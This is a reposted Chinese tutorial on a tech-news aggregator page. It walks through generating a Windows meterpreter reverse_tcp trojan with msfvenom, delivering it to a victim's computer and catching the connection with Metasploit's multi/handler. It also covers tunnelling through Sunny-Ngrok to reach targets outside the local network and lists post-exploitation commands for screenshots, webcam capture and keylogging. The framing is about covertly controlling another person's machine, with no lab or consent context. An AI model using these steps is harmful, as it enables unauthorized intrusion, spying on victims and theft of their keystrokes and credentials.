返回顶部
首页 > 资讯 > 服务器 >kali渗透内网和外网
  • 377
分享到

kali渗透内网和外网

网络安全服务器 2023-09-17 08:09:22 377人浏览 八月长安
摘要

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵) 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下: -p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)

第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:

-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp

lhost:设置kali的IP

lport:设置端口(要与下面的setlport保持一致)

-f:文件的类型为exe类型

-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe

第二步:将生成的木马文件发送到对方电脑

我们启动kali

msfconsole 进入msfconsole

use exploit/multi/handler 使用这个漏洞辅助

设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

exploit 或 run

接下来我们只要等对方电脑运行刚刚那个木马

生成木马文件,从而控制对方电脑(内网可以入侵外网)

在开始生成木马之前,我们要先做好准备工作

在kali里面要下载Sunny-Ngrok的linux64版本,下载好后解压

接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用

这里将下载好的linux64压缩包进行解压

命令解压缩:unzip linux_amd64(压缩包名)

进入解压好的目录

cd linux_amd64

启动隧道映射TCP服务

./sunny clientid (隧道id) 这里的隧道id看下图

启动后是这样的

接下来就是生成外网的木马程序了

注意:这里lhost和lport分别为赠送的域名和端口

msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了

msfconsole 打开msf

use exploit/multi/handler 使用这个漏洞辅助

set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set LHOST 192.168.245.140 这里设置成kali的IP

set LPORT 4444 这里是你要侦听的端口

这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网

show options 查看IP端口设置情况

exploit 或 run 开启侦听

接下来我们只要等对方电脑运行刚刚那个木马

成功后时以下这图

入侵成功后所能做的(这只是可以做的一部分)

getuid 获取靶机uidmeterpreter

shell 进入靶机shellmeterpreter

screenshot 靶机截屏meterpreter

WEBcam_snap 用靶机摄像头拍照meterpreter

webcam_stream 用靶机摄像头录像meterpreter

keyscan_start 开启键盘记录meterpreter

keyscan_dump 捕获键盘记录

keyscan_stop 停止键盘记录

来源地址:https://blog.csdn.net/weixin_62693307/article/details/130198360

--结束END--

本文标题: kali渗透内网和外网

本文链接: https://www.lsjlt.com/news/410803.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • kali渗透内网和外网
    生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵) 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下: -p:使用反向远程控制程序“windows/meterpreter/reverse_tcp” ...
    99+
    2023-09-17
    网络 安全 服务器
  • Kali Linux中怎么进行无线网络渗透测试
    在Kali Linux中进行无线网络渗透测试通常需要使用一些专门的工具和技术。以下是一些常用的步骤和工具: 确保无线网卡驱动程序...
    99+
    2024-04-02
  • 510cms网站渗透测试
    信息收集 510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,后台地址为admin/login.php。     使用wappalyzer检测出网站使用的中间件为Apache/2.4.7、使用的PHP版本为p...
    99+
    2023-09-07
    php 数据库 apache
  • 内网域渗透总结(红日靶场一)
    一、靶场环境搭建 红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/靶机通用密码:hongrisec@2019win7win2003win20...
    99+
    2023-08-31
    内网渗透 红日靶场(一)
  • 内网渗透——macOS上搭建Web服务器
    # 公网访问macOS本地web服务器【内网穿透】 文章目录 1. 启动Apache服务器2. 公网访问本地web服务2.1 本地安装配置cpolar2.2 创建隧道2.3 测试访问公网地址3...
    99+
    2023-10-27
    macos 前端 服务器 运维 网络
  • 网站渗透思路总结
    你对一个指定网入侵的时候,什么是最重要的呢?毫无疑问,那就是思路。 有了思路,会让你的渗透事半功倍,下面讲给大家介绍一些渗透的思路与方法。 当然更重要的还有自己的动手能力和对漏洞原理和相关安全工具的使...
    99+
    2023-09-20
    php 数据库 开发语言
  • 从web到内网渗透的一次过程详解
    目录记一次从web到内网的渗透拓扑图环境介绍渗透过程target1target2taget3记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器,分别为target1,ta...
    99+
    2024-04-02
  • 云服务器内网穿透可以访问外网
    云服务器内网穿透(NAT)可以访问外网,这种情况下,需要确保服务器之间的网络通信是私有的,不被其他人监听和控制。具体操作如下: 使用云服务器的内部IP或域名访问网络。如果使用的是公共IP地址(例如,IPv4或IPv6),可以使用公共NA...
    99+
    2023-10-26
    内网 服务器
  • 内网穿透(什么是内网穿透,为什么要实现内网穿透,mac如何实现内网穿透)
    文章目录 1. 什么是内网穿透?2. 为什么要实现内网穿透?3. mac如何实现内网穿透? 1. 什么是内网穿透? 内网穿透(又称为端口映射),也就是将本地内网端口映射到公网(又称为外...
    99+
    2023-10-01
    macos 网络 服务器
  • 外网访问本地Tomcat服务器【cpolar内网穿透】
    文章目录 前言1.本地Tomcat网页搭建1.1 Tomcat安装1.2 配置环境变量1.3 环境配置1.4 Tomcat运行测试1.5 Cpolar安装和注册 2.本地网页发布2.1.C...
    99+
    2023-09-06
    tomcat 服务器 apache
  • ipv6内网穿透,有ipv6地址外网无法访问
    问题描述 光猫已经开启ipv6,并且电脑/服务器已经有ipv6地址,只能通过ipv6局域网访问,外网/手机流量访问设备 原因分析: 光猫没有关闭防火墙路由器入站防护 解决方案: 1.光猫没有关闭防火墙 这里以中国移动的光猫为例,登陆光...
    99+
    2023-08-19
    服务器 网络 运维
  • 云服务器内网穿透可以访问外网吗
    是的,云服务器可以提供内网穿透功能,允许您访问外网。这通常涉及在公共 Internet 骨干网的不同节点之间进行通讯,但您的客户端不能直接访问该网络。在这种情况下,通常需要使用一些安全技术,例如 VPN、代理服务器或加密技术。 一些常见的...
    99+
    2023-10-27
    内网 服务器 外网吗
  • 云服务器内网和外网
    云服务器内网和外网指的是不同的虚拟网络,它们之间的区别在于物理网络位置和数据流量。 内网是指一台物理服务器,内网与外部通信通过网络进行。因此,内网可以访问外部网站,例如使用网站的域名或者使用网站提供的API进行远程连接。内网访问外网的方式...
    99+
    2023-10-26
    内网 服务器
  • 什么是内网穿透?内网穿透有什么用?内网穿透如何实现
    什么是内网穿透?内网穿透是什么意思?内网穿透有什么用?怎么搭建内网穿透?没公网IP如何做内网穿透? 一、什么是内网穿透 首先我们对内网和外网这两个名词做个解释: 内网:是内部建立的局域网络或办公网络; 外网:是通过一个网关或网桥与其他网络...
    99+
    2023-09-27
    服务器 网络 运维
  • 内网安全:内网穿透详解
    目录 内网穿透技术 内网穿透原理 实验环境 内网穿透项目 内网穿透:Ngrok 配置服务端 客户端配置 客户端生成后门,等待目标上线 内网穿透:Frp 客户端服务端建立连接 MSF生成后门,等待上线 内网穿透:Nps 服务端搭建配置 客户端...
    99+
    2023-09-09
    内网 安全 内网穿透
  • 内网穿透和云服务器
    内网穿透和云服务器都是常用的网络安全技术,它们都可以帮助企业网络在内部网(Intranet)和外部网络(Extranet)之间移动业务数据,从而减少网络攻击的风险。 内网穿透主要是通过在内部网中部署一些安全设备(如防火墙、防病毒软件等),...
    99+
    2023-10-26
    内网 服务器
  • 外网SSH远程连接linux服务器「cpolar内网穿透」
    文章目录 视频教程1. Linux CentOS安装cpolar2. 创建TCP隧道3. 随机地址公网远程连接4. 固定TCP地址5. 使用固定公网TCP地址SSH远程 转载自内网穿透工具的文章:无公网IP,SSH远程连接L...
    99+
    2023-08-19
    linux 服务器 ssh
  • 网站渗透总结之Getshell用法大全
    Getshell分为进管理员后台Getshell和不进后台Getshell,本文主要总结常见进后台Getshell和部分。 ​ 一、进后台Getshell 进台Getshel 管理员后台直接Getshell 管理员后台直接上传Getshel...
    99+
    2023-09-28
    php 数据库 服务器
  • 渗透测试之网站后台扫描(wscan)
    渗透测试之网站后台扫描(wscan) 实验目的一、实验原理1. Wscan 二、实验环境2.1 操作机器2.2 实验工具Wscan 三、实验步骤1. 扫描目标机后台地址 ...
    99+
    2023-10-06
    服务器 运维 web安全
  • 网站渗透测试安全检测方案
    许多客户在网站,以及APP上线的同时,都会提前的对网站进行全面的渗透测试以及安全检测,提前检测出存在的网站漏洞,以免后期网站发展过程中出现重大的经济损失,前段时间有客户找到我们SINE安全公司做渗透测试服务,在此我们将把对客户的整个渗透测试...
    99+
    2023-06-03
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作